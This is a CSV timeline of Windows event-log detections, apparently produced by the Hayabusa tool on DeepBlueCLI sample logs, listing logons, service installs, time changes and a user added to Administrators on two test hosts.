Timestamp,Computer,EventID,Level,MitreAttack,RuleTitle,Details,RulePath,FilePath
2013-10-24 01:16:13.843 +09:00,37L4247D28-05,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:16:27.000 +09:00,37L4247D28-05,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:16:29.000 +09:00,37L4247D28-05,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 01:17:29.468 +09:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: Hyper-V Heartbeat Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature Heartbeat | Account: NT AUTHORITY\NetworkService | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:17:32.328 +09:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: SynthVid | Path: system32\DRIVERS\VMBusVideoM.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:17:38.218 +09:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: Hyper-V Data Exchange Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature KvpExchange | Account: NT AUTHORITY\LocalService | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:17:40.125 +09:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: Hyper-V Guest Shutdown Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature Shutdown | Account: LocalSystem | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:17:41.421 +09:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: Hyper-V Volume Shadow Copy Requestor | Path: %SystemRoot%\system32\vmicsvc.exe -feature VSS | Account: LocalSystem | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:17:43.125 +09:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: netvsc | Path: system32\DRIVERS\netvsc60.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:17:44.875 +09:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: Hyper-V Time Synchronization Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature TimeSync | Account: NT AUTHORITY\LocalService | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:18:09.203 +09:00,37L4247D28-05,2003,low,,Setting Change in Windows Firewall with Advanced Security,,../hayabusa-rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:18:09.203 +09:00,37L4247D28-05,2004,medium,,Added Rule in Windows Firewall with Advanced Security,,../hayabusa-rules/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:18:11.000 +09:00,37L4247D28-05,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:18:50.500 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:21:28.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 01:21:30.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 01:21:33.630 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:39.911 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,low,Persis,Local User Account Created,User: IEUser | SID: S-1-5-21-3463664321-2923530833-3546627382-1000,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx
2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,low,Persis,Local User Account Created,User: IEUser | SID: S-1-5-21-3463664321-2923530833-3546627382-1000,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-3463664321-2923530833-3546627382-1000 | Group: Administrators | LID: 0x3e7,../hayabusa-rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx
2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-3463664321-2923530833-3546627382-1000 | Group: Administrators | LID: 0x3e7,../hayabusa-rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: WIN-QALA5Q3KJ43 | IP Addr: 127.0.0.1 | LID: 0x298c5 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: WIN-QALA5Q3KJ43 | IP Addr: 127.0.0.1 | LID: 0x29908 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:44.979 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: WIN-QALA5Q3KJ43$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:22:44.979 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x298c5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 01:24:00.161 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:27:21.754 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x29908,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:29:39.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:30:52.625 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:30:56.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:30:58.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 02:31:10.741 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:32:13.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:33:10.078 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:33:15.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:33:18.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 02:33:31.593 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x57d5b | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x57d8d | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:36:53.671 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:36:53.671 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x57d5b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:45:29.131 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:45:45.037 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x57d8d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:46:48.772 +09:00,IE8Win7,7045,info,Persis,Service Installed,Name: Windows Activation Technologies Service | Path: %SystemRoot%\system32\Wat\WatAdminSvc.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:48:35.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:50:25.546 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:50:26.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 02:50:27.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 02:50:33.551 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:51:17.207 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:51:17.207 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x27f43,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27f43 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27f73 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 02:55:52.082 +09:00,IE8Win7,7045,info,Persis,Service Installed,Name: Microsoft .NET Framework NGEN v4.0.30319_X86 | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Account: LocalSystem | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:02:24.316 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x27f73,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:03:23.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:04:28.750 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:04:53.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:04:55.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:05:04.098 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:05:33.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:06:18.921 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:06:22.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:06:25.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:07:16.729 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:18:24.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:19:46.750 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:19:51.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:19:52.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:20:01.879 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:21:52.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:23:04.093 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:23:07.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:23:08.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:23:18.798 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:27:14.204 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:27:14.204 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x39a20,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x39a20 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:27:14.204 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x39a67 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:34:54.649 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x39a67,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:35:55.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:36:39.718 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:36:43.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:36:44.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:36:53.245 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:38:41.448 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:38:41.448 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x24902,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x24902 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:38:41.448 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x24936 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:42:34.667 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:42:56.213 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x24936,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:44:06.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:45:58.015 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:45:59.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:46:01.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2013-10-24 04:46:10.368 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:47:07.743 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:47:07.743 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x19489,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x19489 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:47:07.743 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x194bb | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:54:00.258 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x194bb,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:54:08.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2013-10-24 04:54:58.140 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2013-10-24 04:55:00.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
